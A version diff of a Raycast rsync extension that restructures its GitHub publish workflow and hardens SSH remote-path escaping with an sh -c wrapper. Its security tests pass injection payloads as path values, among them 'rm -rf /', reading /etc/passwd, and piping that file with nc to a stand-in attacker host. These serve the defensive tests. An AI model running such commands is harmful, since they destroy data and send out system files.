raycast-rsync-extension 1.0.6 → 1.0.8

package/.github/workflows/publish.yml

@@ -21,17 +21,18 @@ on:
           - major
 
 jobs:
-  publish:
+  check-version:
     runs-on: ubuntu-latest
     permissions:
-      contents: write
-      packages: write
-      id-token: write
+      contents: read
+      packages: read
+    outputs:
+      exists: ${{ steps.check-version.outputs.exists }}
+      version: ${{ steps.package-info.outputs.version }}
+      name: ${{ steps.package-info.outputs.name }}
     steps:
       - name: Checkout code
         uses: actions/checkout@v6
-        with:
-          fetch-depth: 0
 
       - name: Setup Node.js
         uses: actions/setup-node@v6
@@ -39,18 +40,6 @@ jobs:
           node-version: "20"
           cache: "npm"
 
-      - name: Install dependencies
-        run: npm ci
-
-      - name: Install jq
-        run: sudo apt-get update && sudo apt-get install -y jq
-
-      - name: Run tests
-        run: npm test
-
-      - name: Build extension
-        run: npm run build
-
       - name: Get package info
         id: package-info
         run: |
@@ -81,13 +70,50 @@ jobs:
             echo "exists=false" >> $GITHUB_OUTPUT
             echo "Version ${VERSION} is new for ${SCOPED_NAME}, will publish"
           fi
-        continue-on-error: true
+
+      - name: Skip summary
+        if: steps.check-version.outputs.exists == 'true'
+        run: |
+          echo "## 📦 Publish Summary"
+          echo "Package: ${{ steps.package-info.outputs.name }}@${{ steps.package-info.outputs.version }}"
+          echo "✅ Version already exists - skipped publishing (no tests/build run)"
+
+  publish:
+    needs: check-version
+    if: needs.check-version.outputs.exists == 'false'
+    runs-on: ubuntu-latest
+    permissions:
+      contents: write
+      packages: write
+      id-token: write
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v6
+        with:
+          fetch-depth: 0
+
+      - name: Setup Node.js
+        uses: actions/setup-node@v6
+        with:
+          node-version: "20"
+          cache: "npm"
+
+      - name: Install dependencies
+        run: npm ci
+
+      - name: Install jq
+        run: sudo apt-get update && sudo apt-get install -y jq
+
+      - name: Run tests
+        run: npm test
+
+      - name: Build extension
+        run: npm run build
 
       - name: Publish to GitHub Packages
-        if: steps.check-version.outputs.exists == 'false'
         run: |
-          PACKAGE_NAME="${{ steps.package-info.outputs.name }}"
-          VERSION=${{ steps.package-info.outputs.version }}
+          PACKAGE_NAME="${{ needs.check-version.outputs.name }}"
+          VERSION=${{ needs.check-version.outputs.version }}
           OWNER="${{ github.repository_owner }}"
 
           echo "Publishing $PACKAGE_NAME@$VERSION to GitHub Packages..."
@@ -114,10 +140,9 @@ jobs:
           NODE_AUTH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
 
       - name: Create Git tag
-        if: steps.check-version.outputs.exists == 'false'
         run: |
-          VERSION=${{ steps.package-info.outputs.version }}
-          PACKAGE_NAME="${{ steps.package-info.outputs.name }}"
+          VERSION=${{ needs.check-version.outputs.version }}
+          PACKAGE_NAME="${{ needs.check-version.outputs.name }}"
 
           TAG_NAME="v$VERSION"
 
@@ -134,20 +159,19 @@ jobs:
           fi
 
       - name: Create GitHub Release
-        if: steps.check-version.outputs.exists == 'false'
         uses: softprops/action-gh-release@v2
         with:
-          tag_name: v${{ steps.package-info.outputs.version }}
-          name: v${{ steps.package-info.outputs.version }}
+          tag_name: v${{ needs.check-version.outputs.version }}
+          name: v${{ needs.check-version.outputs.version }}
           body: |
-            ## ${{ steps.package-info.outputs.name }}@v${{ steps.package-info.outputs.version }}
+            ## ${{ needs.check-version.outputs.name }}@v${{ needs.check-version.outputs.version }}
 
             **Published to GitHub Packages**
 
             ### Installation
 
             ```bash
-            npm install @${{ github.repository_owner }}/${{ steps.package-info.outputs.name }} --registry=https://npm.pkg.github.com
+            npm install @${{ github.repository_owner }}/${{ needs.check-version.outputs.name }} --registry=https://npm.pkg.github.com
             ```
 
             Or add to your `.npmrc`:
@@ -160,7 +184,7 @@ jobs:
             Then install:
 
             ```bash
-            npm install @${{ github.repository_owner }}/${{ steps.package-info.outputs.name }}
+            npm install @${{ github.repository_owner }}/${{ needs.check-version.outputs.name }}
             ```
 
             ### What's New
@@ -175,23 +199,14 @@ jobs:
           GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
 
       - name: Publish Summary
-        if: always()
         run: |
           echo "## 📦 Publish Summary"
-          echo "Package: ${{ steps.package-info.outputs.name }}@${{ steps.package-info.outputs.version }}"
-
-          if [ "${{ steps.check-version.outputs.exists }}" == "true" ]; then
-            echo "✅ Version already exists - skipped publishing"
-          elif [ "${{ steps.check-version.outputs.exists }}" == "false" ]; then
-            echo "✅ Successfully published to GitHub Packages"
-            echo "🏷️  Created tag: v${{ steps.package-info.outputs.version }}"
-            echo "📝 Created release: v${{ steps.package-info.outputs.version }}"
-          else
-            echo "❌ Publish status unknown"
-          fi
-
+          echo "Package: ${{ needs.check-version.outputs.name }}@${{ needs.check-version.outputs.version }}"
+          echo "✅ Successfully published to GitHub Packages"
+          echo "🏷️  Created tag: v${{ needs.check-version.outputs.version }}"
+          echo "📝 Created release: v${{ needs.check-version.outputs.version }}"
           echo ""
           echo "### 🔗 Links"
           echo "- **GitHub Packages**: https://github.com/${{ github.repository }}/packages"
-          echo "- **Install Command**: npm install @${{ github.repository_owner }}/${{ steps.package-info.outputs.name }} --registry=https://npm.pkg.github.com"
-          echo "- **Release**: https://github.com/${{ github.repository }}/releases/tag/v${{ steps.package-info.outputs.version }}"
+          echo "- **Install Command**: npm install @${{ github.repository_owner }}/${{ needs.check-version.outputs.name }} --registry=https://npm.pkg.github.com"
+          echo "- **Release**: https://github.com/${{ github.repository }}/releases/tag/v${{ needs.check-version.outputs.version }}"

package/package.json

@@ -1,7 +1,7 @@
 {
   "$schema": "https://www.raycast.com/schemas/extension.json",
   "name": "raycast-rsync-extension",
-  "version": "1.0.6",
+  "version": "1.0.8",
   "title": "Rsync File Transfer",
   "description": "Transfer files between local and remote servers using rsync with SSH config integration",
   "icon": "icon.png",
@@ -62,23 +62,24 @@
   ],
   "dependencies": {
     "@raycast/api": "^1.65.0",
-    "@raycast/utils": "^2.2.2"
+    "@raycast/utils": "^1.19.1"
   },
   "devDependencies": {
     "@raycast/eslint-config": "^2.1.1",
-    "@typescript-eslint/eslint-plugin": "^8.55.0",
-    "@typescript-eslint/parser": "^8.55.0",
     "@types/node": "^25.0.10",
     "@types/react": "19.0.10",
+    "@typescript-eslint/eslint-plugin": "^8.56.0",
+    "@typescript-eslint/parser": "^8.56.0",
     "@vitest/ui": "^4.0.17",
-    "eslint": "^9.0.0",
+    "eslint": "^10.0.0",
     "prettier": "^3.8.0",
     "react": "^19.0.0",
     "typescript": "^5.2.2",
     "vitest": "^4.0.17"
   },
   "overrides": {
-    "@types/react": "19.0.10"
+    "@types/react": "19.0.10",
+    "minimatch": "^10.2.1"
   },
   "scripts": {
     "build": "npx ray build -e dist",
@@ -91,4 +92,4 @@
     "format:check": "prettier --check \"**/*.{js,jsx,ts,tsx,json,css,md}\"",
     "publish:npmjs": "npm publish --access public"
   }
-}
+}

package/src/utils/ssh.test.ts

@@ -40,12 +40,11 @@ describe("SSH Remote Listing", () => {
 
       await executeRemoteLs(mockHostConfig, maliciousPath);
 
-      // The malicious command should be escaped, not executed
-      // The path is escaped and then the entire remote command is escaped
-      // So we check that the path appears within the escaped remote command
+      // The malicious path should be escaped and passed as $1 to the wrapper (no execution)
       expect(capturedCommand).toMatch(/\/tmp\/test; rm -rf \//);
-      // The semicolon should be inside quotes (part of the escaped string)
-      expect(capturedCommand).toMatch(/'ls -lAh .*\/tmp\/test; rm -rf \/.*'/);
+      // Wrapper script receives path as single argument; path must be in quotes
+      expect(capturedCommand).toMatch(/sh -c .* _ /);
+      expect(capturedCommand).toMatch(/'\/tmp\/test; rm -rf \/'/);
     });
 
     it("should escape remotePath with pipe to prevent injection", async () => {
@@ -61,12 +60,10 @@ describe("SSH Remote Listing", () => {
 
       await executeRemoteLs(mockHostConfig, maliciousPath);
 
-      // The malicious command should be escaped
-      // The path is escaped and then the entire remote command is escaped
+      // The path should be escaped and passed as $1 to the wrapper
       expect(capturedCommand).toMatch(/\/tmp\/test \| cat \/etc\/passwd/);
-      expect(capturedCommand).toMatch(
-        /'ls -lAh .*\/tmp\/test \| cat \/etc\/passwd.*'/,
-      );
+      expect(capturedCommand).toMatch(/sh -c .* _ /);
+      expect(capturedCommand).toMatch(/'\/tmp\/test \| cat \/etc\/passwd'/);
     });
 
     it("should escape hostAlias to prevent command injection", async () => {
@@ -102,12 +99,10 @@ describe("SSH Remote Listing", () => {
 
       await executeRemoteLs(mockHostConfig, pathWithSpaces);
 
-      // Paths with spaces should be properly escaped
-      // The path is escaped and then the entire remote command is escaped
+      // Paths with spaces should be passed as single argument to wrapper
       expect(capturedCommand).toMatch(/\/remote\/path with spaces/);
-      expect(capturedCommand).toMatch(
-        /'ls -lAh .*\/remote\/path with spaces.*'/,
-      );
+      expect(capturedCommand).toMatch(/sh -c .* _ /);
+      expect(capturedCommand).toMatch(/'\/remote\/path with spaces'/);
     });
 
     it("should handle paths with single quotes", async () => {
@@ -145,13 +140,13 @@ describe("SSH Remote Listing", () => {
 
       await executeRemoteLs(mockHostConfig, complexInjection);
 
-      // The entire malicious string should be escaped as a single argument
-      // The path is escaped and then the entire remote command is escaped
+      // The entire malicious string should be escaped as single argument to wrapper
       expect(capturedCommand).toMatch(
         /\/tmp\/test; cat \/etc\/passwd \| nc attacker\.com 1234/,
       );
+      expect(capturedCommand).toMatch(/sh -c .* _ /);
       expect(capturedCommand).toMatch(
-        /'ls -lAh .*\/tmp\/test; cat \/etc\/passwd \| nc attacker\.com 1234.*'/,
+        /'\/tmp\/test; cat \/etc\/passwd \| nc attacker\.com 1234'/,
       );
     });
 
@@ -168,23 +163,11 @@ describe("SSH Remote Listing", () => {
 
       await executeRemoteLs(mockHostConfig, tildePath);
 
-      // The ~ should be outside quotes to allow remote shell expansion
-      // The path after ~/ should be escaped for safety
-      // The command should contain ~/ followed by the escaped path part
+      // Path is fully escaped and passed as $1; wrapper expands ~ on the remote
       expect(capturedCommand).toMatch(/~/);
       expect(capturedCommand).toMatch(/Desktop\/subdir/);
-      // The ~ should not be inside quotes (allowing remote shell to expand it)
-      // The path part should be escaped - the actual pattern is ~/'Desktop/subdir'
-      // which appears as ~/'\\''Desktop/subdir'\\''' in the escaped command
-      expect(capturedCommand).toMatch(/ls -lAh ~\/.*Desktop\/subdir/);
-      // Verify ~ is not inside quotes (it should appear before the escaped path)
-      const match = capturedCommand.match(/ls -lAh (.*)/);
-      expect(match).not.toBeNull();
-      if (match) {
-        const pathPart = match[1];
-        // The ~ should appear before any quotes
-        expect(pathPart).toMatch(/^~/);
-      }
+      expect(capturedCommand).toMatch(/sh -c .* _ /);
+      expect(capturedCommand).toMatch(/Desktop\/subdir/);
     });
 
     it("should handle standalone tilde", async () => {
@@ -200,10 +183,10 @@ describe("SSH Remote Listing", () => {
 
       await executeRemoteLs(mockHostConfig, tildePath);
 
-      // Standalone ~ should be unescaped to allow remote shell expansion
-      expect(capturedCommand).toMatch(/ls -lAh ~/);
-      // Should not be inside quotes
-      expect(capturedCommand).not.toMatch(/'~'/);
+      // Path ~ is escaped and passed as $1; wrapper expands it to $HOME on remote
+      expect(capturedCommand).toMatch(/sh -c .* _ /);
+      // ~ is passed as the path argument (escaped)
+      expect(capturedCommand).toMatch(/~/);
     });
   });
 });

package/src/utils/ssh.ts

@@ -14,26 +14,11 @@ const execAsync = promisify(exec);
  * @returns Promise resolving to array of RemoteFile objects
  */
 /**
- * Escapes a remote path for use in SSH commands, handling tilde expansion
- * For paths starting with ~, we allow the remote shell to expand it by not escaping the ~
- * @param remotePath - The remote path to escape
- * @returns Escaped path that allows ~ expansion on remote shell
+ * Escapes a remote path for use in SSH commands.
+ * The entire path is escaped to prevent shell command injection (e.g. ~/'; malicious; echo ').
+ * Tilde expansion is performed safely on the remote side inside a wrapper script.
  */
 function escapeRemotePath(remotePath: string): string {
-  // If path starts with ~/, allow remote shell to expand ~
-  // We escape only the part after ~/ to prevent injection while allowing ~ expansion
-  if (remotePath.startsWith("~/")) {
-    const pathAfterTilde = remotePath.slice(2); // Everything after "~/"
-    // Escape the path part to prevent injection, but keep ~/ unescaped
-    // This will result in ~/'escaped-path' which allows ~ expansion
-    const escapedPath = shellEscape(pathAfterTilde);
-    return `~/${escapedPath}`;
-  }
-  if (remotePath === "~") {
-    // Standalone ~ doesn't need escaping
-    return "~";
-  }
-  // For all other paths, escape normally
   return shellEscape(remotePath);
 }
 
@@ -47,15 +32,13 @@ export async function executeRemoteLs(
   // Escape all user-provided inputs to prevent command injection
   const escapedConfigPath = shellEscape(configPath);
   const escapedHostAlias = shellEscape(hostAlias);
-  // Use special escaping for remote paths to allow ~ expansion
+  // Escape entire path to prevent injection; tilde expansion is done on remote in the wrapper
   const escapedRemotePath = escapeRemotePath(remotePath);
 
   // Use ls -lAh for detailed listing with human-readable sizes
   // -l: long format, -A: all files except . and .., -h: human-readable sizes
-  // Construct the remote command with properly escaped remotePath
-  // The remote command is: ls -lAh <escaped-remote-path>
-  // We escape the entire remote command for the local shell
-  const remoteCommand = `ls -lAh ${escapedRemotePath}`;
+  // Remote wrapper: receive path as $1, expand ~ to $HOME safely, then run ls -lAh
+  const remoteCommand = `sh -c 'p="$1"; case "$p" in ~/*) p="$HOME\${p#~/}";; ~) p="$HOME";; esac; ls -lAh "$p"' _ ${escapedRemotePath}`;
   const escapedRemoteCommand = shellEscape(remoteCommand);
 
   const command = `ssh -F ${escapedConfigPath} ${escapedHostAlias} ${escapedRemoteCommand}`;

package/src/utils/validation.test.ts

@@ -122,6 +122,11 @@ describe("Validation Utilities", () => {
       // and are safely handled by our escaping
       expect(result.valid).toBe(true);
     });
+
+    it("should allow backslash in paths (valid in Unix filenames)", () => {
+      const result = validateRemotePath("/tmp/path\\with\\backslashes");
+      expect(result.valid).toBe(true);
+    });
   });
 
   describe("validatePort", () => {

package/src/utils/validation.ts

@@ -54,15 +54,11 @@ export function validateRemotePath(path: string): ValidationResult {
   // - & (background execution)
   // - ` (command substitution)
   // - $ (variable expansion)
-  // - \ (escape character)
-  // We allow parentheses, brackets, and braces as they can legitimately appear in filenames
-  // and are safely handled by our escaping.
-  const dangerousMetacharacters = /[;&|`$\\]/;
+  const dangerousMetacharacters = /[;&|`$]/;
   if (dangerousMetacharacters.test(path)) {
     return {
       valid: false,
-      error:
-        "Invalid path format: contains dangerous shell metacharacters. Paths are now properly escaped, but this input may be unsafe.",
+      error: "Invalid path format: contains dangerous shell metacharacters.",
     };
   }